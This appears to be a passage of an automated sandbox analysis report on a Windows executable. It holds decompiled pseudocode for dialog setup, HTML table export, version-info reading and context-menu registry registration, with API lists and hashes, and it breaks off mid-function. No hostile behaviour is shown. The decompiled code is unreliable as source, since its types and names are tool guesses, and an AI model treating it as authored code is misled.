                                                                                                                				_t134 = _t124 + 0x78;
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                                				_t119 = 1;
                                                                                                                				do {
                                                                                                                					_t17 = _t119 + 0x280; // 0x281
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t119 = _t119 + 1;
                                                                                                                				} while (_t119 <= 9);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                                				_t121 = 1;
                                                                                                                				do {
                                                                                                                					_t21 = _t121 + 0x294; // 0x295
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t121 = _t121 + 1;
                                                                                                                				} while (_t121 <= 3);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                                				_t122 = 0;
                                                                                                                				do {
                                                                                                                					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t122 = _t122 + 1;
                                                                                                                				} while (_t122 <= 0xd);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                                				_t123 = 0;
                                                                                                                				do {
                                                                                                                					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t123 = _t123 + 1;
                                                                                                                					_t143 = _t123 - 3;
                                                                                                                				} while (_t123 < 3);
                                                                                                                				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                                				E00403EC3(GetDlgItem, _t113);
                                                                                                                				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				_t88 = E00402D78(_t113, _t143);
                                                                                                                				E00402BEE(_t113);
                                                                                                                				return _t88;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void _v138;
                                                                                                                				long _v140;
                                                                                                                				void _v242;
                                                                                                                				char _v244;
                                                                                                                				void _v346;
                                                                                                                				char _v348;
                                                                                                                				void _v452;
                                                                                                                				void _v962;
                                                                                                                				signed short _v964;
                                                                                                                				void* __esi;
                                                                                                                				void* _t87;
                                                                                                                				wchar_t* _t109;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t153;
                                                                                                                				intOrPtr* _t154;
                                                                                                                				signed int _t156;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t159;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t124 = __ebx;
                                                                                                                				_v964 = _v964 & 0x00000000;
                                                                                                                				memset( &_v962, 0, 0x1fc);
                                                                                                                				_t125 = 0x18;
                                                                                                                				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                				asm("movsw");
                                                                                                                				_t153 = 0;
                                                                                                                				_v244 = 0;
                                                                                                                				memset( &_v242, 0, 0x62);
                                                                                                                				_v348 = 0;
                                                                                                                				memset( &_v346, 0, 0x62);
                                                                                                                				_v140 = 0;
                                                                                                                				memset( &_v138, 0, 0x62);
                                                                                                                				_t161 = _t159 + 0x3c;
                                                                                                                				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                                				if(_t87 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_t87,  &_v964));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0x32);
                                                                                                                					_push( &_v244);
                                                                                                                					L0040B1EC();
                                                                                                                					_t161 = _t161 + 0x18;
                                                                                                                				}
                                                                                                                				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                				_v8 = _t153;
                                                                                                                				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                                					while(1) {
                                                                                                                						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                                						_v12 = _t156;
                                                                                                                						_t157 = _t156 * 0x14;
                                                                                                                						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                                							wcscpy( &_v140, L" nowrap");
                                                                                                                						}
                                                                                                                						_v32 = _v32 | 0xffffffff;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _t153;
                                                                                                                						_t154 = _a8;
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                                						E0040ADC0(_v32,  &_v348);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                                						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                                						} else {
                                                                                                                							_push( *(_t157 + _v16 + 0x10));
                                                                                                                							_push(E0040ADC0(_t106,  &_v964));
                                                                                                                							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                							_push(0x2000);
                                                                                                                							_push( *(_t124 + 0x68));
                                                                                                                							L0040B1EC();
                                                                                                                							_t161 = _t161 + 0x14;
                                                                                                                						}
                                                                                                                						_t109 =  *(_t124 + 0x64);
                                                                                                                						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                							wcscat(_t109, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                                						_push( &_v140);
                                                                                                                						_push( &_v348);
                                                                                                                						_push( *(_t124 + 0x68));
                                                                                                                						_push( &_v244);
                                                                                                                						_push( &_v452);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t161 = _t161 + 0x28;
                                                                                                                						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t153 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L14:
                                                                                                                				E00407343(_t124, _a4, L"</table><p>");
                                                                                                                				return E00407343(_t124, _a4, L"\r\n");
                                                                                                                			}
































Memory Dump Source
• Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				long _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				char _v2564;
                                                                                                                				char _v35332;
                                                                                                                				char _t51;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                
                                                                                                                				E0040B550(0x8a00, __ecx);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x1fc);
                                                                                                                				_v1540 = 0;
                                                                                                                				memset( &_v1538, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t79 = _t78 + 0x24;
                                                                                                                				if(_a20 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t79 = _t79 + 0x18;
                                                                                                                				}
                                                                                                                				if(_a24 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                                					_push(L"<font color=\"%s\">");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v1540);
                                                                                                                					L0040B1EC();
                                                                                                                					wcscpy( &_v1028, L"</font>");
                                                                                                                					_t79 = _t79 + 0x20;
                                                                                                                				}
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                				_push(0x3fff);
                                                                                                                				_push( &_v35332);
                                                                                                                				L0040B1EC();
                                                                                                                				_t80 = _t79 + 0x10;
                                                                                                                				E00407343(_a4, _a8,  &_v35332);
                                                                                                                				_t51 = _a16;
                                                                                                                				if(_t51 > 0) {
                                                                                                                					_t73 = _a12 + 4;
                                                                                                                					_a20 = _t51;
                                                                                                                					do {
                                                                                                                						_v516 = 0;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						_t54 =  *_t73;
                                                                                                                						_t81 = _t80 + 0xc;
                                                                                                                						if( *_t54 == 0) {
                                                                                                                							_v516 = 0;
                                                                                                                						} else {
                                                                                                                							_push(_t54);
                                                                                                                							_push(L" width=\"%s\"");
                                                                                                                							_push(0xff);
                                                                                                                							_push( &_v516);
                                                                                                                							L0040B1EC();
                                                                                                                							_t81 = _t81 + 0x10;
                                                                                                                						}
                                                                                                                						_push( &_v1028);
                                                                                                                						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                						_push( &_v1540);
                                                                                                                						_push( &_v516);
                                                                                                                						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                						_push(0x3fff);
                                                                                                                						_push( &_v35332);
                                                                                                                						L0040B1EC();
                                                                                                                						_t80 = _t81 + 0x1c;
                                                                                                                						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                                						_t73 = _t73 + 8;
                                                                                                                						_t36 =  &_a20;
                                                                                                                						 *_t36 = _a20 - 1;
                                                                                                                					} while ( *_t36 != 0);
                                                                                                                					return _t61;
                                                                                                                				}
                                                                                                                				return _t51;
                                                                                                                			}





















                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00000000
                                                                                                                0x00407cfc
                                                                                                                0x00407d00

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v32;
                                                                                                                				void _v2078;
                                                                                                                				signed int _v2080;
                                                                                                                				void _v4126;
                                                                                                                				char _v4128;
                                                                                                                				void _v6174;
                                                                                                                				char _v6176;
                                                                                                                				void _v8222;
                                                                                                                				char _v8224;
                                                                                                                				signed int _t49;
                                                                                                                				short _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				int _t73;
                                                                                                                				intOrPtr _t78;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				E0040B550(0x201c, __ecx);
                                                                                                                				_t73 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                                					L6:
                                                                                                                					return _t73;
                                                                                                                				}
                                                                                                                				_v6176 = 0;
                                                                                                                				memset( &_v6174, 0, 0x7fe);
                                                                                                                				_t78 = _a4;
                                                                                                                				_push(_t78 + 0x20a);
                                                                                                                				_push(_t78);
                                                                                                                				_push(L"%s\\shell\\%s\\command");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v6176);
                                                                                                                				L0040B1EC();
                                                                                                                				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                                					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                					_t73 =  ~_t49 + 1;
                                                                                                                					RegCloseKey(_v12);
                                                                                                                					_v2080 = _v2080 & 0x00000000;
                                                                                                                					memset( &_v2078, 0, 0x7fe);
                                                                                                                					E00404AD9( &_v2080);
                                                                                                                					if(_v2078 == 0x3a) {
                                                                                                                						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                                						_v32 = _t55;
                                                                                                                						_t56 =  *0x40ccdc; // 0x5c
                                                                                                                						_v28 = _t56;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						_v32 = _v2080;
                                                                                                                						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                                							_v4128 = 0;
                                                                                                                							memset( &_v4126, 0, 0x7fe);
                                                                                                                							_v8224 = 0;
                                                                                                                							memset( &_v8222, 0, 0x7fe);
                                                                                                                							_push(_a4 + 0x20a);
                                                                                                                							_push(_a4);
                                                                                                                							_push(L"%s\\shell\\%s");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v8224);
                                                                                                                							L0040B1EC();
                                                                                                                							_push( &_v2080);
                                                                                                                							_push(L"\"%s\",0");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v4128);
                                                                                                                							L0040B1EC();
                                                                                                                							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				RegCloseKey(_v8);
                                                                                                                				goto L6;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                                				void _v530;
                                                                                                                				char _v532;
                                                                                                                				void _v1042;
                                                                                                                				long _v1044;
                                                                                                                				long _v4116;
                                                                                                                				char _v5164;
                                                                                                                				void* __edi;
                                                                                                                				void* _t27;
                                                                                                                				void* _t38;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				E0040B550(0x142c, __ecx);
                                                                                                                				_v1044 = 0;
                                                                                                                				memset( &_v1042, 0, 0x1fc);
                                                                                                                				_v532 = 0;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_pop(_t44);
                                                                                                                				E00405AA7( &_v5164);
                                                                                                                				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                                				_t61 = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					wcscpy( &_v1044,  &_v4116);
                                                                                                                					_pop(_t44);
                                                                                                                				}
                                                                                                                				wcscpy(0x40fb90, _a8);
                                                                                                                				wcscpy(0x40fda0, L"general");
                                                                                                                				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                                				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                                				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                                				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                                				wcscpy(0x40fda0, L"strings");
                                                                                                                				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                                				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                                				return _t38;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
